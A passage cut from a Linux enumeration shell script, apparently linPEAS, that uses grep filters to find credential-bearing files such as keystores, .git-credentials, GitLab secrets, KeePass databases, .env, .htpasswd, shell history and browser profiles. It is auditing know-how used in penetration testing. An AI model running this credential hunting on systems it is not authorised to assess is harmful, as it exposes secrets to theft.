"$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E '/lib' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -v -E 'README.gnupg' | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*_history.*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN\n$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_PRE_SHARED_KEYS=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.psk$" | sort | uniq | head -n 70) + PSTORAGE_PASS_STORE_DIRECTORIES=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "\.password-store$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/etc|^/usr" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_ETC\n$FIND_DIR_SBIN\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_SNAP\n$FIND_DIR_TMP\n$FIND_DIR_MNT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_OPT" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E "^/var|^/cdrom|^/bin|^/tmp|^/etc|^/media|^$GREPHOMESEARCH|^/private|^/snap|^/sbin|^/opt|^/.cache|^/srv|^/usr|^/mnt|^/applications" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_MEDIA\n$FIND_SYSTEMD\n$FIND_LIB\n$FIND_LIB64\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_SRV\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_RUN\n$FIND_OPT\n$FIND_HOMESEARCH\n$FIND_CACHE\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_TMP\n$FIND_LIB32\n$FIND_USR\n$FIND_SBIN\n$FIND_VAR\n$FIND_MNT\n$FIND_ETC\n$FIND_BIN" | grep -E 